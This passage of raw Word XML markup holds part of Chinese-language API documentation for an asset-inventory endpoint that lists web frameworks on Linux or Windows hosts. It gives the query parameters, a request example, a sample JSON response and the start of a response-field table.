        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279DFCA4"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370"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="3036"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="7190616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2F1EBED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45F4E6D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F47ECB7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65510DEE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="74C93A31" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AF6064F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B5CE6A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="160897D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62B5D56A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1DB42B53" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66CA5F36" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CB38CBB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F2AD447" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="791E6275" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="45D4BF8D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23EEDCB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D95BF28" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14D32C3D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0454D750" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6AB7EABB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DC55380" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66210FB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D64E4DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42AC6553" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7DF72374" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CB4F003" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34686208" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23859690" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56EDDAFE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>web应用框架名称（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="23A7A46D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D180989" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E3291ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2515240A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37145FB0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>web应用框架版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7AB6ECA3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="715BB9FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66FB41A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50129196" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7368133C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>框架语言</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5185D189" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56A1358E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>serverName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01906AAC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C58F30C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B70CD6F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>服务类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15C44B6D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268E5DE1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3EB44CF1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F888FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "fe107d9c77f4c77a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.244",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "12345",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签a"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "xdu-vm-cent51",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name": "Apache Commons CLI\r (wisteria.jar)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "version": "1.4",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "type": "java",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>serverName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "Spring Boot",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>domainName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webAppDir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/data/app/titan-wisteria/upload/wisteria-3.0.4-oldtcm_180320145655/wisteria.jar",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AABA6FA"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520"/>
        <w:gridCol w:w="1058"/>
        <w:gridCol w:w="5339"/>
        <w:gridCol w:w="2165"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="478A578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6319B97" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="282AB05F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08BCEF0D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="532B8496" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4D5C65DA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="214D3C4D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B0F106B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BF5A66B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19FE5700" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">agent </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="414628A6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CBC47A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E154A8E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61D9D352" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C8CD14B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1CB52708" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B9252A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7778BAA9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D9DCCDE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59C95B01" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4ECABE49" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CA7266F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="637A69EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A3EC82B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05920B5E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="300D200B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52F2C5A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
